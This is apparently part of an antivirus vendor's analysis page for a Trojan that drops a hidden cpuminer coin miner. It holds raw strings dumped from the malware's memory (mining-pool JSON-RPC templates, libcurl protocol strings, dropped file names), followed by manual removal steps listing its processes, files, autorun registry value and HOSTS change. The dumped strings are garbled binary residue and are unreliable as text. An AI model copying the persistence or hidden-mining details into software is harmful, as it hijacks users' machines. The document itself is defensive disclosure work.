SQSSSh

L$dh%sJ

Sh%sJ

I <~%f

_.Cuf

Uh%sJ

SSSh0

Vh%sJ

Z|SSShP

tMSSShPmD

D$,SSShP

SSShPmD

t SSSh

~*SSSh

t{SSShP

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

KERNEL32.dll

GetKeyboardType

USER32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

ggkzvymkohy.exe

um.exe

ocpqnmwyvi.exe

@W.iFd

QC.cP

.rtdt

_.ieu

,A.Fk

.JP%Bj

%X),U'L

PûH

0F5%F

.ES/a

I-i%D

zcÁ

%Documents and Settings%\LocalService

%WinDir%\TEMP\sgupsfom6l2aum.exe

mscoree.dll

KERNEL32.DLL

win32drkclient.exe_5916:

.text

``.data

.rdata

`@.bss

.idata

\\\\5\\\\

|$@3\$,3\$0

\$$!|$$!

|$ 1|$41

\$0#\$(1

|$\3|$81

\$\3\$`3

""""%""""1

1|$,1\$,

\$\3\$ 1|$(

\$43\$01

\$ 3\$41

1\$,1|$,

\$ 3\$(3\$8

|$03|$43|$@

|$,3|$83|$ 3|$

libgcj-13.dll

accepted: %lu/%lu (%.2f%%), %s khash/s %s

DEBUG: reject reason: %s

cpuminer 2.3.2

DEBUG: job_id='%s' extranonce2=%s ntime=x

JSON decode of %s failed

http://

https://

stratum tcp://

http://%s

Starting Stratum on %s

...terminating workio thread

...retry after %d seconds

JSON decode failed(%d): %s

{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}

{"method": "getwork", "params": [ "%s" ], "id":1}

Binding thread %d to cpu %d

thread %d: %lu hashes, %s khash/s

Total: %s khash/s

work retrieval failed, exiting mining thread %d

JSON key '%s' not found

JSON key '%s' is not a string

CURL initialization failed

%s%s%s

Long-polling activated for %s

json_rpc_call failed, retry after %d seconds

DEBUG: got new work in %d ms

http://127.0.0.1:9332/

%s: unsupported non-option argument '%s'

JSON option %s invalid

https:

%s:%s

thread %d create failed

%d miner threads started, using '%s' algorithm.

cert

userpass

[%d-d-d d:d:d] %s

User-Agent: cpuminer/2.3.2

HTTP request failed: %s

JSON-RPC call failed: %s

hex2bin failed on '%s'

DEBUG: %s

Hash: %s

Target: %s

http%s

http_proxy

Stratum connection failed: %s

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}

mining.notify

Stratum session id: %s

mining.set_difficulty

client.reconnect

stratum tcp://%s:%d

Server requested reconnection to %s

client.get_version

cpuminer/2.3.2

client.show_message

MESSAGE FROM SERVER: %s

{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}

#"! '&%$ *)(/.-,32107654;:98?>=<2

tXXFr.rh.44Aw-wl-66

r.rh.44Fw-wl-66A

.rh.44Fr-wl-66Aw

O9K\9..eKW

trh.44Fr.wl-66Aw-

K\9..eK9

h.44Fr.rl-66Aw-w

O\9..eK9K=W

.44Fr.rh-66Aw-wl

9..eK9K\W

t44Fr.rh.66Aw-wl-

..eK9K\9

tX4Fr.rh.46Aw-wl-6

.eK9K\9.

7.35.0

smtp

tftp

getpeername() failed with errno %d: %s

getsockname() failed with errno %d: %s

ssrem inet_ntop() failed with errno %d: %s

ssloc inet_ntop() failed with errno %d: %s

sa_addr inet_ntop() failed with errno %d: %s

Trying %s...

Could not set TCP_NODELAY: %s

TCP_NODELAY set

Failed to set SO_KEEPALIVE on fd %d

Failed to set SIO_KEEPALIVE_VALS on fd %d: %d

Couldn't bind to interface '%s'

Local Interface %s is ip %s using address family %i

Name '%s' family %i resolved to '%s' family %i

Local port: %hu

Bind to local port %hu failed, trying next

bind failed with errno %d: %s

Immediate connect fail for %s: %s

Couldn't bind to '%s'

connect to %s port %ld failed: %s

Failed to connect to %s port %ld: %s

[%s %s %s]

Send failure: %s

Recv failure: %s

Write callback asked for PAUSE when not supported!

%s:%d

Hostname was %sfound in DNS cache

timeout on name lookup is not supported

%5[^:]:%d:%5s

Resolve %s found illegal!

Added %s:%d:%s to DNS cache

IDN support not present, can't parse Unicode domains

CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!

Connected to %s (%s) port %ld (#%ld)

User-Agent: %s

[^:]:%[^

:]://%[^

 malformed

SMTP.

Rebuilt URL to: %s

Protocol %s not supported or disabled in libcurl

%s://%s

[%*45[0123456789abcdefABCDEF:.]%c

;type=%c

%s://%s%s%s:%hu%s%s%s

Port number too large: %lu

Couldn't find host %s in the _netrc file; using defaults

[email protected]

Found bundle for host %s: %p

Server doesn't support pipelining

Found connection %ld, with requests in the pipe (%zu)

Re-using existing connection! (#%ld) with host %s

Couldn't resolve host '%s'

Couldn't resolve proxy '%s'

Connection #%ld to host %s left intact

Curl_poll(%d ds, %d ms)

Internal error clearing splay node = %d

Internal error removing splay node = %d

Pipe broke: handle 0x%p, url = %s

In state %d with no easy_conn, bail out!

Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received

Operation timed out after %ld milliseconds with %I64d bytes received

#HttpOnly_

23[^;

=]=I99[^;

httponly

skipped cookie with bad tailmatch domain: %s

%s cookie %s="%s" for domain %s, path %s, expire %I64d

# Netscape HTTP Cookie File

# http://curl.haxx.se/docs/http-cookies.html

# This file was generated by libcurl! Edit at your own risk.

# Fatal libcurl error

WARNING: failed to save cookies in %s

%d.%d.%d.%d

CURLSHcode unknown

Protocol option is unsupported

Protocol is unsupported

Socket is unsupported

Operation not supported

Address family not supported

Protocol family not supported

Winsock version not supported

Unknown error %d (%#x)

Please call curl_multi_perform() soon

Unsupported protocol

URL using bad/illegal format or missing URL

A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.

FTP: weird server reply

FTP: The server failed to connect to data port

FTP: unknown PASS reply

FTP: Accepting server connect has timed out

FTP: unknown PASV reply

FTP: unknown 227 response format

FTP: can't figure out the host in the PASV response

FTP: couldn't set file type

FTP: couldn't retrieve (RETR failed) the specified file

HTTP response code said error

FTP: command PORT failed

FTP: command REST failed

Operation was aborted by an application callback

A libcurl function was given a bad argument

An unknown option was passed in to libcurl

SSL peer certificate or SSH remote key was not OK

Problem with the local SSL certificate

Peer certificate cannot be authenticated with given CA certificates

Unrecognized or bad HTTP Content or Transfer-Encoding

Invalid LDAP URL

Login denied

TFTP: File Not Found

TFTP: Access Violation

TFTP: Illegal operation

TFTP: Unknown transfer ID

TFTP: No such user

Caller must register CURLOPT_CONV_ callback options

Problem with the SSL CA cert (path? access rights?)

Error in the SSH layer

Issuer check against peer certificate failed

FTP: The server did not accept the PRET command.

Unable to parse FTP file list

0123456789

%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s

Curl_ipv4_resolve_r failed for %s

%sAuthorization: Basic %s

HTTP/

Avoided giant realloc for header (max is %d)!

The requested URL returned error: %d

%s auth using %s with user '%s'

%s, d %s M d:d:d GMT

If-Modified-Since: %s

If-Unmodified-Since: %s

Last-Modified: %s

Referer: %s

Accept-Encoding: %s

Host: %s%s%s

Host: %s%s%s:%hu

ftp://

Range: bytes=%s

Content-Range: bytes %s%I64d/%I64d

Content-Range: bytes %s/%I64d

ftp://%s:%s@%s

%s HTTP/%s

%s%s%s%s%s%s%s%s%s%s%s

%s%s=%s

Internal HTTP POST error!

Content-Type: application/x-www-form-urlencoded

Failed sending HTTP POST request

Failed sending HTTP request

Chunky upload is not supported by HTTP 1.0

HTTP error before end of send, stop sending

HTTP/%d.%d =

HTTP =

RTSP/%d.%d =

The requested URL returned error: %s

HTTP 1.0, assume close after body

HTTP/1.0 proxy connection set to keep alive!

HTTP/1.1 proxy connection set close!

HTTP/1.0 connection set to keep alive!

USER %s

PBSZ %d

Failure sending QUIT command: %s

ftp server doesn't support SIZE

RETR %s

Connect data stream passively

APPE %s

STOR %s

SIZE %s

getsockname() failed: %s

failed to resolve the address provided to PORT: %s

bind(port=%hu) on non-local address failed: %s

bind(port=%hu) failed: %s

bind() failed, we ran out of ports!

socket failure: %s

%s |%d|%s|%hu|

Failure sending EPRT command: %s

,%d,%d

%s %s

Failure sending PORT command: %s

Uploading to a URL without a file name!

FTPS not supported!

PASS %s

ACCT %s

Access denied: d

%c%c%c%u%c

Illegal port number in EPSV reply

%d,%d,%d,%d,%d,%d

Skips %d.%d.%d.%d for data connection, uses %s instead

Bad PASV/EPSV response: d

Can't resolve proxy host %s:%hu

Can't resolve new host %s:%hu

Connecting to %s (%s) port %d

TYPE %c

MDTM %s

CWD %s

PRET %s

PRET STOR %s

PRET RETR %s

REST %d

FTP response timeout

FTP response aborted due to select/poll error: %d

Preparing for accepting server on data port

Got a d ftp-server response when 220 was expected

unsupported parameter to CURLOPT_FTPSSLAUTH: %d

AUTH %s

ACCT rejected by server: d

PROT %c

Entry path is '%s'

QUOT command failed with d

MKD %s

Failed to MKD dir: d

dddddd

ddd d:d:d GMT

Last-Modified: %s, d %s M d:d:d GMT

unsupported MDTM reply format

Got a d response code instead of the assumed 200

PRET command not accepted: d

Failed to do PORT

RETR response: d

Failed FTP upload: 

Wildcard - START of "%s"

Wildcard - "%s" skipped by user

ftp_perform ends with SECONDARY: %d

Remembering we are in dir "%s"

Failure sending ABOR command: %s

server did not report OK, got %d

QUOT string not accepted: %s

PORT

%s IAC %s

%s IAC %d

%s %s %s

%s %s %d

%s %d %d

Sending data failed (%d)

%s IAC SB

%s (unsupported)

%d (unknown)

%c%c%c%c%s%c%c

%c%c%c%c

7[^,],7s

%c%s%c%s

USER,%s

7[^= ]%*[ =]%5s

Syntax error in telnet option: %s

Unknown telnet option %s

WSAStartup failed (%d)

insufficient winsock version to support telnet

failed to load WS2_32.DLL (%d)

failed to find WSACreateEvent function (%d)

failed to find WSACloseEvent function (%d)

failed to find WSAEventSelect function (%d)

failed to find WSAEnumNetworkEvents function (%d)

WSACreateEvent failed (%d)

WSAEnumNetworkEvents failed (%d)

WSACloseEvent failed (%d)

FreeLibrary(wsock2) failed (%d)

WS2_32.DLL

CLIENT libcurl 7.35.0

MATCH %s %s %s

DEFINE %s %s

LDAP local: LDAP Vendor = %s ; LDAP Version = %d

LDAP local: %s

LDAP local: Cannot connect to %s:%ld

LDAP local: ldap_simple_bind_s %s

LDAP remote: %s

There are more than %d entries

LDAP local: trying to establish %s connection

Couldn't open file %s

Can't open %s for writing

Can't get the size of %s

Received last DATA packet block %d again.

Received unexpected DATA packet block %d, expecting block %d

Timeout waiting for block %d ACK. Retries = %d

tftp_rx: internal error

set timeouts for state %d; Total %ld, retry %d maxtry %d

Received ACK for block %d, expecting %d

tftp_tx: giving up waiting for block %d ack

tftp_tx: internal error, event: %i

bind() failed; %s

%s%c%s%c

tftp_send_first: internal error

TFTP finished

TFTP response timeout

got option=(%s) value=(%s)

blksize is larger than max supported

%s (%d)

blksize is smaller than min supported

%s (%ld)

%s (%d) %s (%d)

invalid tsize -:%s:- value in OACK packet

TFTP

%cd

LIST "%s" *

FETCH %s BODY[%s]

LOGIN

LOGIN %s %s

AUTHENTICATE %s %s

AUTHENTICATE %s

No known authentication mechanisms supported!

IMAPS not supported!

Access denied: %d

APPEND %s (\Seen) {%I64d}

SELECT %s

LOGINDISABLED

STARTTLS not supported.

STARTTLS denied. %c

Access denied. %c

Authentication failed: %d

AUTH %s %s

POP3S not supported!

APOP %s %s

STLS not supported.

RCPT TO:%s

RCPT TO:<%s>

SMTPS not supported!

Got unexpected smtp-server response: %d

EHLO %s

HELO %s

Remote access denied: %d

Command failed: %d

MAIL failed: %d

RCPT failed: %d

DATA failed: %d

MAIL FROM:%s

MAIL FROM:%s AUTH=%s

MAIL FROM:%s AUTH=%s SIZE=%s

MAIL FROM:%s SIZE=%s

SMTP

Refusing to issue an RTSP request [%s] without a session ID.

Transport:

Transport: %s

Refusing to issue an RTSP SETUP without a Transport: header.

Range: %s

%s %s RTSP/1.0

Session: %s

%s%s%s%s%s%s

Unable to read the CSeq header: [%s]

Got RTSP Session ID Line [%s], but wanted ID [%s]

Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds

%%X

xxxx

%s:%s:%s

%s:%.*s

%s:%s:x:%s:%s:%s

%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=x, qop=%s, response="%s"

%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"

%s, opaque="%s"

%s, algorithm="%s"

SOCKS4 communication to %s:%d

SOCKS4 connect to %s (locally resolved)

Failed to resolve "%s" for SOCKS4 connect.

SOCKS4%s request granted.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.

User was rejected by the SOCKS5 server (%d %d).

SOCKS5 GSSAPI per-message authentication is not supported.

No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)

Failed to resolve "%s" for SOCKS5 connect.

Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)

Can't complete SOCKS5 connection to %s:%d. (%d)

Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)

Establish HTTP proxy tunnel to %s:%hu

%s:%hu

%s%s%s:%hu

Host: %s

CONNECT %s HTTP/%s

%s%s%s%s

HTTP/1.%d %d

TUNNEL_STATE switched to: %d

Received HTTP code %d from proxy after CONNECT

login

password

operation aborted by callback

Read callback asked for PAUSE when not supported!

seek callback returned error %d

the ioctl callback returned %d

ioctl callback returned error %d

Rewinding stream by : %zd bytes on url %s (zero-length body)

Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)

HTTP server doesn't seem to support byte ranges. Cannot resume.

Simulate a HTTP 304 response!

Problem (%d) in the Chunked-Encoded data

Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)

Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d

No URL set!

[^?&/:]://%c

Issue another request to this URL: '%s'

Violate RFC 2616/10.3.2 and switch from POST to GET

Violate RFC 2616/10.3.3 and switch from POST to GET

Disables POST, goes with %s

Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s

Site %s:%d is pipeline blacklisted

Server %s is not blacklisted

Server %s is blacklisted

d:d:d

d:d

%c%c==

%c%c%c=

------------------------xx

; filename="%s"

%s; boundary=%s

Content-Type: multipart/mixed, boundary=%s

Content-Type: %s

couldn't open file "%s"

--%s--

.jpeg

.html

0123456789-

%s xxxxxxxxxxxxxxxx

%s/%s

username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s

user=%s

auth=Bearer %s

%s near '%s'

%s near end of file

unable to decode byte 0x%x at position %d

control character 0x%x

invalid Unicode '\uX\uX'

invalid Unicode '\uX'

end == saved_text   lex->saved_text.length

unable to open %s: %s

\ux

\ux\ux

Assertion failed: (%s), file %s, line %d

M%p %d %s

M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s

once %p is %d

T%p %d %s

T%p %d V=%0X H=%p %s

C%p %d %s

C%p %d V=%0X B=%d b=%p w=%ld %s

RWL%p %d %s

RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s

_matherr(): %s in %s(%g, %g) (retval=%g)

VirtualQuery failed for %d bytes at address %p

VirtualProtect failed with code 0x%x

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

unknown option -- %s

unknown option -- %c

option requires an argument -- %s

option requires an argument -- %c

jZGCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)

GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)

PeekNamedPipe

_acmdln

_amsg_exit

ldap_msgfree

ADVAPI32.dll

KERNEL32.dll

msvcrt.dll

USER32.dll

wldap32.dll

WS2_32.dll

"@"@"@"@

File: %ws, Line %u

ocpqnmwyvi.exe_2212:

.text

`.rdata

@.data

RSSSSSSh

UUj%U

SQSSSh

L$dh%sJ

Sh%sJ

I <~%f

_.Cuf

Uh%sJ

SSSh0

Vh%sJ

Z|SSShP

tMSSShPmD

D$,SSShP

SSShPmD

t SSSh

~*SSSh

t{SSShP

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

KERNEL32.dll

GetKeyboardType

USER32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

ggkzvymkohy.exe

um.exe

ocpqnmwyvi.exe

@W.iFd

QC.cP

.rtdt

_.ieu

,A.Fk

.JP%Bj

%X),U'L

PûH

0F5%F

.ES/a

I-i%D

zcÁ

%Documents and Settings%\LocalService

%System%\ocpqnmwyvi.exe

mscoree.dll

KERNEL32.DLL

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   ocpqnmwyvi.exe:2212
   ocpqnmwyvi.exe:2080
   %original file name%.exe:628
   wuauclt.exe:304
   sgupsfom6d23um.exe:4708
   sgupsfom69tcumfnx1sg.exe:2612
   sgupsfom6y57um.exe:5940
   sgupsfom6l2aum.exe:3140
   ggkzvymkohy.exe:4980
   ggkzvymkohy.exe:3708

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %System%\hntwpyzd\tst (10 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\sgupsfom69tcumfnx1sg.exe (6296 bytes)
   %WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
   %WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
   %WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
   %System%\hntwpyzd\etc (10 bytes)
   %System%\ggkzvymkohy.exe (6841 bytes)
   %System%\drivers\etc\hosts (22 bytes)
   %System%\hntwpyzd\run (10 bytes)
   %System%\win32drkclient.exe (25340 bytes)
   %System%\win64drkaesent.exe (67687 bytes)
   %WinDir%\Temp\sgupsfom6x6xum.exe (1940 bytes)
   %System%\hntwpyzd\cfg (711 bytes)
   %WinDir%\Temp\sgupsfom6l2aum.exe (6841 bytes)
   %System%\win64drkclient.exe (68472 bytes)
   %System%\hntwpyzd\ihst (444 bytes)
   %WinDir%\Temp\sgupsfom6d23um.exe (35 bytes)
   %WinDir%\Temp\sgupsfom6y57um.exe (35 bytes)
   %System%\ocpqnmwyvi.exe (6841 bytes)
   %System%\hntwpyzd\por (1 bytes)
   %System%\hntwpyzd\rng (204 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Background Quality Color Authentication Detection" = "%System%\ggkzvymkohy.exe"

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.